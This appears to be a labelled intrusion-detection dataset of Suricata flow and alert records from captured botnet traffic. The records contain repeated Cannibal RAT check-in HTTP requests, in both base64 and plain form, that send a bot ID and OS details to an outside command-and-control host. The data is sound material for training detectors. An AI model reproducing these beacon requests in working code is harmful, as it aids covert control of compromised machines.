event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4030017, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:09:55
121,923
Friday
[{'timestamp': '2017-07-07T13:09:55.997322+0000', 'flow_id': 1303142606265940, 'pcap_cnt': 4030017, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1998, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:55.876116+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAof7hAAIAGPW7AqAoJza6lSQfOH5Cy/wxbZ3vE01ARAQBeIgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:09:55.997322+0000', 'flow_id': 1303142606265940, 'pcap_cnt': 4030017, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1998, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:09:55.876116+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAof7hAAIAGPW7AqAoJza6lSQfOH5Cy/wxbZ3vE01ARAQBeIgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,083
192.168.10.15-52175-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4031514, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:10:01
77,428
Friday
[{'timestamp': '2017-07-07T13:10:01.663616+0000', 'flow_id': 158847354926154, 'pcap_cnt': 4031514, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52175, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:01.586826+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobddAAIAGT0nAqAoPza6lScvPH5CIVEMD91HT5lARAQDvMwAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:10:01.663616+0000', 'flow_id': 158847354926154, 'pcap_cnt': 4031514, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52175, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:01.586826+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobddAAIAGT0nAqAoPza6lScvPH5CIVEMD91HT5lARAQDvMwAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,117
192.168.10.15-52176-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4047383, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:10:11
74,201
Friday
[{'timestamp': '2017-07-07T13:10:11.738477+0000', 'flow_id': 89410619254372, 'pcap_cnt': 4047383, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52176, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:11.665188+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobdxAAIAGT0TAqAoPza6lScvQH5BT6XbyBF5j1lARAQBSswAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:10:11.738477+0000', 'flow_id': 89410619254372, 'pcap_cnt': 4047383, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52176, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:11.665188+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobdxAAIAGT0TAqAoPza6lScvQH5BT6XbyBF5j1lARAQBSswAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,188
192.168.10.15-52177-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4070803, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:10:21
78,503
Friday
[{'timestamp': '2017-07-07T13:10:21.805434+0000', 'flow_id': 1165287042652878, 'pcap_cnt': 4070803, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52177, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:21.727758+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobeFAAIAGTz/AqAoPza6lScvRH5C2DMep98Ir1lARAQDkcgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:10:21.805434+0000', 'flow_id': 1165287042652878, 'pcap_cnt': 4070803, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52177, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:21.727758+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobeFAAIAGTz/AqAoPza6lScvRH5C2DMep98Ir1lARAQDkcgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,434
192.168.10.15-52178-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4074879, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:10:27
72,882
Friday
[{'timestamp': '2017-07-07T13:10:27.722108+0000', 'flow_id': 603290572417681, 'pcap_cnt': 4074879, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52178, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:27.649873+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobeZAAIAGTzrAqAoPza6lScvSH5C2mCqYQGzUNlARAQCP7QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:10:27.722108+0000', 'flow_id': 603290572417681, 'pcap_cnt': 4074879, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52178, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:10:27.649873+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobeZAAIAGTzrAqAoPza6lScvSH5C2mCqYQGzUNlARAQCP7QAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,237,606
192.168.10.15-52179-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4076597, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:10:31
66,190
Friday
